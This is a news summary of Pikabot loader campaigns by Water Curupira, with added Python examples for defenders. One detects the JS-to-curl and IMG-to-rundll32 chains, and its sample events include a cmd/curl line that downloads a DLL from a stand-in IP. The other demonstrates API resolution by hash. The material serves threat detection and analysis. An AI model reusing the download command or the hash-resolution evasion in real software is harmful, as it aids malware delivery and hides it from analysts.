Pikabot is a loader malware distributed in spam campaigns and used by the threat group Water Curupira, whose campaigns paused from June to September 2023 following the Qakbot takedown.
A surge in Pikabot phishing campaigns was observed in Q4 2023, after the Qakbot takedown, suggesting that Pikabot is a potential replacement for Qakbot.
Researchers at Trend Micro report that the Water Curupira group has been actively launching Pikabot attacks against Windows machines.
The Pikabot phishing operations deliver two components, a loader and a core module, that together give the attackers unauthorized remote access to the victim machine.
Water Curupira, previously known for dropping Cobalt Strike backdoors, ran DarkGate and IcedID campaigns in early Q3 2023 and has since shifted exclusively to Pikabot.
Pikabot gains initial access via spam emails, mirroring Qakbot's behavior.
The threat actors hijack existing email threads so that their messages appear to belong to a legitimate conversation.
The messages carry original content urging the recipient to open a password-protected archive attachment, with file names and passwords that vary between campaigns; the archive contains either a JS file or an IMG file.
In the first chain, the attached archive holds an obfuscated JS file of more than 100 KB. When executed, it attempts a series of conditional commands via cmd.exe.
If those commands fail, the script echoes, pings, and downloads the Pikabot payload using curl.exe.
A second chain uses a password-protected archive containing an IMG file. Mounting the IMG exposes an LNK file, which launches rundll32.exe to run the Pikabot DLL.
A third, PDF-based chain seen in Q4 2023 disguises the PDF as a OneDrive file-sharing notice and leads the victim to a malicious JS file.
This JS variant relies on array manipulation and obfuscation to hide how it retrieves the Pikabot payload.
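The two delivery chains above can be surfaced from process-creation telemetry. The following Python script is an added example, not code from the gbhackers article or from the Trend Micro report; it runs two detections over a constructed, simplified set of Sysmon-style process-creation events (the paths, PIDs, drive letter, IP address and export name are assumed for illustration): a curl.exe download whose ancestry is cmd.exe under a script host, and rundll32.exe loading a DLL from a drive other than the system drive, which is how a mounted IMG appears.

```python
"""Detect the JS -> cmd.exe -> curl.exe and IMG -> LNK -> rundll32.exe chains
in process-creation telemetry. Added example; the events below are constructed,
simplified Sysmon Event ID 1 records, not captured data."""
import re
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed sample events. ppid links each process to its parent.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Chain 1: JS from a password-protected archive -> wscript -> cmd -> curl
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Temp1_doc.zip\doc.js"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo ok && ping -n 3 127.0.0.1 && curl.exe -o %TEMP%\x.dll http://203.0.113.7/a'},
    {"pid": 202, "ppid": 201, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe -o C:\Users\alice\AppData\Local\Temp\x.dll http://203.0.113.7/a'},
    # Chain 2: IMG mounted as E: -> LNK -> rundll32 loads the DLL (export name assumed)
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe E:\setup.dll,Entry'},
    # Benign: curl typed into an interactive console, no script host above it
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": 401, "ppid": 400, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://example.org/"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
RUNDLL_RE = re.compile(r'rundll32\.exe\s+"?([A-Za-z]:\\[^",\s]+)', re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events: List[Dict], pid: int) -> Iterator[str]:
    """Yield the image basename of the process, then of each parent in turn."""
    by_pid = {e["pid"]: e for e in events}
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield basename(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]


def detect_script_curl_chain(events: List[Dict]) -> List[Tuple[int, Optional[str]]]:
    """curl.exe whose parent is cmd.exe and whose grandparent is wscript/cscript.
    Returns (pid, downloaded URL or None) for each hit."""
    hits = []
    for e in events:
        if basename(e["image"]) != "curl.exe":
            continue
        chain = list(ancestry(events, e["pid"]))
        if len(chain) >= 3 and chain[1] == "cmd.exe" and chain[2] in SCRIPT_HOSTS:
            m = URL_RE.search(e["cmdline"])
            hits.append((e["pid"], m.group(0) if m else None))
    return hits


def detect_rundll32_offsystem(events: List[Dict], system_drive: str = "C:") -> List[Tuple[int, str]]:
    """rundll32.exe loading a DLL from a drive other than the system drive
    (a mounted IMG gets its own drive letter). Returns (pid, DLL path)."""
    hits = []
    for e in events:
        if basename(e["image"]) != "rundll32.exe":
            continue
        m = RUNDLL_RE.search(e["cmdline"])
        if m and not m.group(1).upper().startswith(system_drive.upper()):
            hits.append((e["pid"], m.group(1)))
    return hits


if __name__ == "__main__":
    for pid, url in detect_script_curl_chain(EVENTS):
        print(f"script-host curl download: pid={pid} url={url}")
    for pid, dll in detect_rundll32_offsystem(EVENTS):
        print(f"rundll32 DLL off system drive: pid={pid} dll={dll}")
```

The interactive curl at pid 401 is deliberately not flagged: the rule keys on the script host two generations up, not on curl.exe alone, which keeps administrators' downloads out of the alert queue. The rundll32 heuristic is coarse (any non-system drive) and should be narrowed to removable or virtual-disk volumes where the telemetry records the device type.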
Analysis of the DLL reveals a 32-bit sample with 1,515 exports.
Its 'Limit' export decrypts and executes shellcode, which first checks for a debugger via Windows API calls.
The shellcode then decrypts a second DLL that carries the anti-analysis routines and loads encrypted PNG images that contain the core module.
Pikabot injects the core module into a suspended process using indirect system calls, and the core module resolves the APIs it needs from hash values after decryption.
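Resolving APIs from hash values means the shellcode carries no import names: it walks a DLL's export table, hashes each name with its own routine, and keeps the address whose hash matches a stored constant. The Python below is an added example, not Pikabot's code or Trend Micro's tooling; it uses a generic ROR-13 hash as an assumed stand-in (Pikabot's actual hashing routine is not given on this page) and a constructed export table with made-up addresses, and shows both the resolver side and the analyst side, where the same hash is precomputed over known export names to recover what a captured constant refers to.

```python
"""API resolution by hash: resolver side and analyst side. Added example.
The ROR-13 routine is a generic stand-in, not Pikabot's own algorithm."""
from typing import Dict, Iterable, List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Rotate-right-13 accumulator over the ASCII bytes of an export name."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & MASK32
        h = (h + b) & MASK32
    return h


# Constructed export table: (name, RVA). The addresses are made up.
FAKE_EXPORTS: List[Tuple[str, int]] = [
    ("CloseHandle", 0x1A2B0),
    ("CreateProcessW", 0x1B0C4),
    ("NtAllocateVirtualMemory", 0x2C110),
    ("VirtualAlloc", 0x2D340),
    ("VirtualProtect", 0x2D5F0),
    ("WriteProcessMemory", 0x2E008),
]


def resolve_by_hash(exports: Iterable[Tuple[str, int]], target_hash: int) -> Optional[int]:
    """What the shellcode does: hash every export name in turn and return the
    address of the first match, or None if no export hashes to the target."""
    for name, rva in exports:
        if ror13_hash(name) == target_hash:
            return rva
    return None


def build_lookup(names: Iterable[str]) -> Dict[int, str]:
    """Analyst side: precompute hash -> name for known export names, and
    refuse colliding entries so a wrong mapping cannot slip in silently."""
    table: Dict[int, str] = {}
    for n in names:
        h = ror13_hash(n)
        if h in table and table[h] != n:
            raise ValueError(f"hash collision: {table[h]} vs {n}")
        table[h] = n
    return table


def label_hashes(hashes: Iterable[int], table: Dict[int, str]) -> List[str]:
    """Map constants pulled from a sample to names, marking the unknown ones."""
    return [table.get(h, f"unknown(0x{h:08x})") for h in hashes]


if __name__ == "__main__":
    table = build_lookup(n for n, _ in FAKE_EXPORTS)
    wanted = [ror13_hash("VirtualAlloc"), ror13_hash("VirtualProtect"), 0xDEADBEEF]
    print(label_hashes(wanted, table))
    print(hex(resolve_by_hash(FAKE_EXPORTS, ror13_hash("VirtualAlloc")) or 0))
```

In practice the analyst's table is built from the real export lists of ntdll.dll, kernel32.dll and the other libraries the sample touches, and the hash routine is lifted from the decrypted shellcode; an "unknown" result then usually means either a different routine or a per-sample key mixed into the hash.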
Water Curupira's shift to Pikabot has not changed its end goal: the loader is used to drop backdoors such as Cobalt Strike, activity that is linked to Black Basta ransomware.
The clusters of Cobalt Strike beacons and the more than 70 C&C domains observed in this actor's campaigns point to an association with the Black Basta ransomware operation.
This Cyber News was published on gbhackers.com. Publication date: Wed, 10 Jan 2024 11:13:10 +0000